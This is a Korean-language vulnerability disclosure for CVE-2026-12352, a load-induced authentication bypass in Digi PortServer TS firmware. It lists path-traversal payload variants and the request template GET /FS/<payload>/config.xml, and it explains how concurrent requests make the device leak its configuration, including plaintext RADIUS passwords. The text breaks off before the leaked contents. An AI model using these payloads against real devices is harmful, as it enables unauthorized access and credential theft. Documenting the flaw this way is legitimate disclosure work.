
CVE-2026-12352에 대한 개념 증명(PoC)으로, Digi PortServer TS의 인증 우회 취약점으로, 높은 동시성 환경에서 일반 텍스트 RADIUS 비밀번호를 포함한 장치 구성을 노출합니다.
Digi PortServer TS 4 H MEI에서 인증되지 않은 부하 유발 인증 우회(load-induced authentication bypass) 취약점이 확인되었으며, 유효한 자격 증명 없이 로컬 장치 구성 파일을 검색할 수 있습니다. 동시 요청 부하가 증가하면 웹 서버가 인증 확인이 완료되기 전에 파일 내용을 제공하기 시작합니다. 이는 인증 확인 자체의 명확한 로직 결함이라기보다는 포화된 연결/요청 큐를 통해 파일 핸들러로 요청이 전달되기 때문일 가능성이 높습니다.
테스트된 펌웨어: 82000747_V1 (2012-06-02) 및 82000747_AB (2025-09-04).
../../../../../../../
../../../../../../..
/../../../../../../../
/../../../../../../..
..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..
\..\..\..\..\..\..\..\..
..2f..2f..2f..2f..2f..2f..2f
..2f..2f..2f..2f..2f..2f..
4 2f..2f..2f..2f..2f..2f..2f..2f
2f..2f..2f..2f..2f..2f..2f..
/.\\./.\\./.\\./.\\./.\\./.\\./
..//..//..//..//..//
//..//..//..//..//..//
//..//..//..//..//..//
GET /FS/<payload>/config.xml 요청은 일반적으로 401 Unauthorized를 반환합니다. 동일한 요청을 낮은 동시성(1개 스레드, 1초 지연)으로 보내면 장치는 인증 전에 요청을 일관되게 올바르게 거부합니다.
동시성이 증가하면(5, 6, 10, 20개의 동시 요청으로 테스트됨) 장치는 인증 챌린지 없이 config.xml의 전체 내용을 포함하는 HTTP/0.9 응답(헤더 없음, 본문만)을 간헐적으로 반환하기 시작합니다. 이는 펌웨어의 HTTP 핸들러에 고정된 요청 처리 용량이 있으며, 이를 초과하면 요청이 인증 확인을 완전히 우회할 수 있음을 나타냅니다.
공개된 구성 파일에는 다음이 포함됩니다: